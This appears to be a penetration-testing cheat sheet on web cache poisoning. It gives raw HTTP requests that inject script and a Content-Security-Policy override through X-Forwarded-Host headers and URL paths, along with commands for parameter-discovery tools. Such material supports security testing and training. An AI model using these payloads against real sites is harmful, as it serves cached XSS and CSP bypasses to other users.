# Web Cache Poisoning

### General

{% hint style="info" %}
Web cache poisoning is an advanced technique whereby an attacker exploits the behavior of a web server and cache so that a harmful HTTP response is served to other users.

Fundamentally, web cache poisoning involves two phases. First, the attacker must work out how to elicit a response from the back-end server that inadvertently contains some kind of dangerous payload. Once successful, they need to make sure that their response is cached and subsequently served to the intended victims.

A poisoned web cache can potentially be a devastating means of distributing numerous different attacks, exploiting vulnerabilities such as XSS, JavaScript injection, open redirection, and so on.
{% endhint %}

## Web Cache Poisoning <a href="#web-cache-poisoning" id="web-cache-poisoning"></a>

### Reflected XSS with Cache Poisoning <a href="#reflected-xss-with-cache-poisoning" id="reflected-xss-with-cache-poisoning"></a>

If the website reflects our arbitrary path in the result such as below.

```
https://example.com/xyz

# Output in the 404 page
Page not found: /xyz
```

We may try XSS as below.

```
https://example.com/xyz<script>alert(1)</script>
```

If we use **Burp Repeater** to send the request above, the URL won't be normalized so leads the reflected XSS. Then the cache will be poisoned. In this state, if you ask the victim to visit this URL, they will see this cached result. In other words, the reflected XSS is performed despite URL normalization in the victim's web browsers.

### Meta Tag XSS <a href="#meta-tag-xss" id="meta-tag-xss"></a>

```
GET /?id=1 HTTP/1.1
Host: victim.com
X-Forwarded-Host: evil.com
...

<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https://evil.com/example.jpg" />
```

#### Exploit <a href="#exploit" id="exploit"></a>

```
GET /?id=2 HTTP/1.1
Host: victim.com
X-Forwarded-Host: evil.com"><script>alert(1)</script>
...

<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https:/evil.com"><script>alert(1)</script>" />
```

### Meta Tag CSP Overriding <a href="#meta-tag-csp-overriding" id="meta-tag-csp-overriding"></a>

If the website sets **CSP (Content-Security-Policy)** using `meta` tag, we can override this CSP settings by cache poisoning, then we can bypass CSP and may cause other attacks.

```
GET /?id=2 HTTP/1.1
Host: victim.com
X-Forwarded-Host: victim.com"><meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'unsafe-inline'">
...

<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https:/victim.com"><meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'unsafe-inline'">
```

### References <a href="#references" id="references"></a>

* [PortSwigger](https://portswigger.net/web-security/web-cache-poisoning)
* [OWASP](https://owasp.org/www-community/attacks/Cache_Poisoning)
* [0xn3va](https://0xn3va.gitbook.io/cheat-sheets/web-application/web-cache-poisoning)

### Tools

```bash
# https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner
wcvs -u https://url.com
# https://github.com/s0md3v/Arjun
python3 arjun.py -u https://url.com --get 
python3 arjun.py -u https://url.com --post
# https://github.com/maK-/parameth
python parameth.py -u https://example.com/test.php
# https://github.com/devanshbatham/ParamSpider
python3 paramspider.py --domain example.com
# https://github.com/s0md3v/Parth
python3 parth.py -t example.com
```

```markup
# XSS for users accessing /en?region=uk:
GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>"
```